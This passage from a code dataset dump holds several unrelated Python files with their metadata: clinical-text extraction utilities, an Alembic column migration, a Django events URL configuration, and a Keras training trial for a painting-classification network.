textfile[negation_beg : negation_end]\n m = negation.search(str)\n item[\"negative\"] = \"Yes\" if m != None else \"No\"\n\n match_output.append(item)\n\n return match_output\n\n# TODO: Current and admit weight. Which one to include?\n# TODO: If no section headings?\ndef matchWeight(sentences, measurements, text, heads={}, section=\"\"):\n possible_weights = {}\n\n if bool(heads) and section != \"\":\n section_beg = heads[section][0]\n section_end = heads[section][1]\n else:\n section_beg = 0\n section_end = len(text)\n\n for key in measurements:\n measure = measurements[key]\n mea_beg = measure[\"beg\"]\n mea_end = measure[\"end\"]\n is_weight = False\n for r in WEIGHT_UNIT_REGEX:\n m = r.search(measure[\"content\"])\n if m != None:\n is_weight = True\n break\n # TODO: if the sentence also have words like weigh or weighs, etc.\n if is_weight and mea_beg >= section_beg and mea_end <= section_end: possible_weights[key] = measure\n\n weights = []\n for key in possible_weights:\n weights.append(possible_weights[key])\n return weights\n\ndef matchHeight(sentences, measurements, text, heads={}, section=\"\"):\n possible_heights = {}\n\n if bool(heads) and section != \"\":\n section_beg = heads[section][0]\n section_end = heads[section][1]\n else:\n section_beg = 0\n section_end = len(text)\n\n for key in measurements:\n measure = measurements[key]\n mea_beg = measure[\"beg\"]\n mea_end = measure[\"end\"]\n is_height = False\n for r in HEIGHT_UNIT_REGEX:\n m = r.search(measure[\"content\"])\n if m != None:\n is_height = True\n break\n\n if is_height and mea_beg >= section_beg and mea_end <= section_end: possible_heights[key] = measure\n\n heights = []\n for key in possible_heights:\n sen_id = findSentenceNumber(possible_heights[key][\"beg\"], possible_heights[key][\"end\"], sentences)\n sentence = sentences[sen_id][\"content\"]\n\n # TODO: if heights and non-heights measurements in the same sentence?\n for r in HEIGHT_REGEX:\n m = r.search(sentence)\n if m != None: heights.append(possible_heights[key])\n return heights\n\n# match markers with results\ndef matchMarkers(markers, results, heads={}, section=\"\"):\n markers_in = getEntitiesInSection(markers, heads=heads, section=section)\n results_in = getEntitiesInSection(results, heads=heads, section=section)\n\n combined = combineIndexedEntities(markers_in, results_in)\n matches = findmatch(combined, 1, \"marker\", \"marker result\")\n\n match_output = []\n keys = [k for k in matches]\n keys.sort()\n for key in keys:\n item = {}\n item[\"marker\"] = combined[key][\"content\"]\n item[\"result\"] = \"Unknown\" if matches[key] == -1 else combined[matches[key]][\"content\"]\n match_output.append(item)\n\n return match_output\n\n# TODO: find stage information through NP's. This should simplify the code.\ndef findStages(nps, romans, sentences, text):\n textfile = open(text, \"r\").read()\n\n stage_regex = [\n re.compile(r'\\bstage\\b',re.IGNORECASE),\n re.compile(r'\\brai stage\\b',re.IGNORECASE)\n ]\n\n stages = {}\n for r in stage_regex:\n iters = r.finditer(textfile)\n for it in iters:\n item = {}\n item[\"beg\"] = it.span()[0]\n item[\"end\"] = it.span()[1]\n item[\"type\"] = \"stage\"\n item[\"content\"] = it.group()\n item[\"sen_id\"] = findSentenceNumber(item[\"beg\"], item[\"end\"], sentences)\n stages[item[\"beg\"]] = item\n\n stages = catEntities(stages, text)\n\n stage_roman = combineIndexedEntities(stages, romans)\n matches = findmatch(stage_roman, 1, \"stage\", \"roman\")\n\n match_output = []\n keys = [k for k in matches]\n keys.sort()\n for key in keys:\n item = {}\n item[\"stage\"] = stage_roman[key][\"content\"]\n item[\"stage number\"] = \"Unknown\" if matches[key] == -1 else stage_roman[matches[key]][\"content\"]\n match_output.append(item)\n\n return match_output\n\n# TODO: find consistent data format for diagnoses/diseases, stages and fish, maybe markers\n# TODO: merge fish with other marker tests\ndef findFISH(nps, heads={}, section=\"\"):\n fishes = []\n\n fish_re = re.compile(r'\\bfish\\b', re.IGNORECASE)\n\n nps_in = getEntitiesInSection(nps, heads=heads, section=section)\n\n for key in nps:\n m = fish_re.search(nps[key][\"content\"])\n if m != None:\n fishes.append(nps[key][\"content\"])\n\n return fishes\n\n# determine drinking and smoking status\n# returns 1 for positive, -1 for negative and 0 for unknown\n# TODO: differentiate between patient and relatives status\ndef determineDrinkingAndSmoking(sentences, modifiers, targets, mode, heads={}, section=\"\"):\n indexed_sentences = sentences.copy()\n addSentenceNumber_new(indexed_sentences, sentences)\n sentences_in = {}\n\n if mode == \"smoking\":\n regex = SMOKING_REGEX\n target_cat = \"smoking\"\n else:\n regex = DRINKING_REGEX\n target_cat = \"drinking\"\n\n for s in indexed_sentences:\n for r in regex:\n m = r.search(s[\"content\"])\n if m != None: sentences_in[s[\"sen_id\"]] = s\n # for r in DRINKING_REGEX:\n # m = r.search(s[\"content\"])\n # if m != None and s[\"sen_id\"]: sentences_in[s[\"sen_id\"]] = s\n\n if bool(sentences_in) == False: return 0\n\n status = True\n for key in sentences_in:\n str = sentences_in[key][\"content\"]\n markup = pyConText.ConTextMarkup()\n markup.setRawText(str.lower())\n\n markup.cleanText()\n\n markup.markItems(modifiers, mode=\"modifier\")\n markup.markItems(targets, mode=\"target\")\n\n markup.pruneMarks()\n\n markup.applyModifiers()\n edges = markup.edges()\n\n negation_cat = \"definite_negated_existence\"\n\n negation_existed = False\n target_existed = False\n\n for edge in edges:\n edge_existed = (len(edge) > 0)\n for node in edge:\n categories = node.getCategory()\n for c in categories:\n if c == negation_cat: negation_existed = True\n if c == target_cat: target_existed = True\n\n if negation_existed and target_existed: status = False\n\n return 1 if status == True else -1\n\n# return entities in a certain range only\ndef boundEntities(entities, beg, end, mode=\"indexed\"):\n\n if mode == \"indexed\":\n entities_in = {}\n\n for key in entities:\n if entities[key][\"beg\"] >= beg and entities[key][\"end\"] <= end:\n entities_in[key] = entities[key]\n return entities_in\n\n if mode == \"nonindexed\":\n entities_in = []\n\n for entity in entities:\n if entity[\"beg\"] >= beg and entity[\"end\"] <= end:\n entities_in.append(entity)\n return entities_in", "sub_path": "Old/Utils.py", "file_name": "Utils.py", "file_ext": "py", "file_size_in_byte": 37854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 24, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 32, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 33, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 34, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 35, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 37, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 38, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 39, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 42, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 42, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 45, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 48, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 48, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 50, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 51, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 51, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 52, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 57, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 58, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 58, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 59, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 61, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 61, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 63, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 64, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 64, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 65, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 65, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 66, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 67, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 67, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 68, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 69, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 70, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 75, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 76, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 76, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 77, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 78, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 78, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 79, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 80, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 80, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 81, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 81, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 86, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 87, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 87, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 88, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 88, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 89, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 90, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 91, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 91, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 99, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 100, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 104, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 104, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 105, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 105, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 110, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 110, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 111, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 112, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 112, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 113, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 114, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 114, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 115, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 115, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 116, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 116, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 117, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 118, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 119, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 119, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 120, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 120, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 125, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 129, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 129, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 130, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 130, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 131, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 131, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 132, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 133, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 133, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 137, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 137, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 138, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 142, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 142, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 143, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 143, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 144, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 144, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 145, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 145, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 146, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 146, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 147, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 147, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 151, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 151, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 152, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 153, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 153, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 154, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 154, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 155, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 155, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 158, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 161, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 161, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 162, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 162, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 163, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 163, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 164, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 164, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 165, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 166, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 166, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 167, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 167, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 168, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 168, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 169, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 170, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 170, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 171, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 171, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 172, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 172, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 173, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 173, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 174, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 174, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 175, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 175, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 176, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 176, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 177, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 177, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 178, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 178, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 179, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 179, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 180, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 180, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 181, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 181, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 182, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 182, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 183, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 183, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 184, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 184, "usage_type": "attribute"}, {"api_name": "xml.etree.cElementTree.iterparse", "line_number": 219, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree", "line_number": 219, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 519, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 519, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 523, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 526, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 772, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 872, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 872, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 873, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 873, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 909, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 909, "usage_type": "attribute"}, {"api_name": "pyConTextNLP.pyConTextGraph.ConTextMarkup", "line_number": 948, "usage_type": "call"}, {"api_name": "pyConTextNLP.pyConTextGraph", "line_number": 948, "usage_type": "name"}]} +{"seq_id": "361116916", "text": "\"\"\"empty message\n\nRevision ID: d75bb81b399a\nRevises: 0cccc063c7da\nCreate Date: 2018-01-29 15:28:14.881306\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd75bb81b399a'\ndown_revision = '0cccc063c7da'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('alert', sa.Column('description', sa.String(length=128), nullable=True))\n op.drop_column('alert', 'title')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('alert', sa.Column('title', sa.VARCHAR(length=128), autoincrement=False, nullable=True))\n op.drop_column('alert', 'description')\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/d75bb81b399a_.py", "file_name": "d75bb81b399a_.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "265188433", "text": "from django.conf.urls import url\n\nfrom events import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^create/$', views.create, name='create'),\n url(r'^new/$', views.new, name='newEvents'),\n url(r'^feature/$', views.feature, name='featureEvents'),\n url(r'^search/$', views.search, name='searchEvents'),\n url(r'^update/$', views.update, name='updateEvents'),\n\n # ex: /polls/5/\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^(?P[0-9]+)/addNotify/$', views.addNotify, name='addNotify'),\n url(r'^(?P[0-9]+)/edit$', views.edit, name='edit'),\n url(r'^(?P[0-9]+)/delete$', views.delete, name='delete'),\n]\n", "sub_path": "events/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "events.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "events.views.create", "line_number": 7, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "events.views.new", "line_number": 8, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "events.views.feature", "line_number": 9, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "events.views.search", "line_number": 10, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "events.views.update", "line_number": 11, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "events.views.detail", "line_number": 14, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "events.views.addNotify", "line_number": 15, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "events.views.edit", "line_number": 16, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "events.views.delete", "line_number": 17, "usage_type": "attribute"}, {"api_name": "events.views", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "482460580", "text": "from keras.losses import categorical_crossentropy\nfrom keras.optimizers import Adam\nimport tensorflow as tf\n\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, accuracy_score\n\nimport pedl\nfrom pedl.frameworks.keras import KerasTrial\nfrom pedl.frameworks.keras.data import KerasDataAdapter\n\nfrom train_cnn import _cnn\nfrom data_provider import load_organized_data_info, train_val_dirs_generators\nfrom validation import _create_pairs_generator, IMGS_DIM_1D\nfrom utils import pairs_dot\nfrom config import *\n\n\nclass PainterTrial(KerasTrial):\n def __init__(self, hparams):\n super().__init__(hparams)\n\n self.kernel_size = pedl.get_hyperparameter(\"kernel_size\")\n self.dropout = pedl.get_hyperparameter(\"dropout\")\n self.pool_size = pedl.get_hyperparameter(\"pool_size\")\n self.l2_reg = pedl.get_hyperparameter(\"l2_reg\")\n self.lr = pedl.get_hyperparameter(\"lr\")\n self.my_batch_size = pedl.get_hyperparameter(\"batch_size\")\n self.data_info = load_organized_data_info(IMGS_DIM_1D)\n\n def build_model(self, hparams):\n return _cnn(IMGS_DIM_3D)\n\n def optimizer(self):\n adam = Adam(lr=self.lr)\n return adam\n\n def loss(self):\n return categorical_crossentropy\n\n def batch_size(self):\n return self.my_batch_size\n\n # This is an abstract function which the trial class needs for instantiation.\n def validation_metrics(self):\n return {}\n\n # HACK: compute the validation metrics in a customized way.\n def compute_validation_metrics(self, step_id):\n assert self.validation_data_adapter is not None\n assert self.model is not None\n\n self.validation_data_adapter.start(is_validation=True)\n validation_iterator = self.validation_data_adapter.get_iterator()\n assert validation_iterator is not None\n\n # TODO: preallocate numpy arrays\n X_val_embedded = None\n y_val = None\n\n # Shape of X_batch: (96=batch_size, 3, 256, 256 (dims of a single image)).\n # Shape of y_batch: (96=batch_size, number of classes).\n num_inputs = 0\n for X_batch, y_batch in validation_iterator:\n # Shape of X_embedded: (96=batch_size, number of classes).\n X_embedded = self.model.predict(X_batch)\n\n # Shape of X_val_embedded: (iteration * batch_size, number of classes).\n if X_val_embedded is None:\n X_val_embedded = X_embedded\n else:\n X_val_embedded = np.concatenate((X_val_embedded, X_embedded), axis=0)\n\n # Shape of y_val: number of (iteration * batch_size, number of classes).\n if y_val is None:\n y_val = y_batch\n else:\n y_val = np.concatenate((y_val, y_batch), axis=0)\n num_inputs += len(X_batch)\n\n self.validation_data_adapter.stop()\n\n # Calculate categorical cross entropy for validation data,\n # which is the same loss as used in training\n y_pred_vec = tf.convert_to_tensor(X_val_embedded)\n y_val_vec = tf.convert_to_tensor(y_val)\n cce = 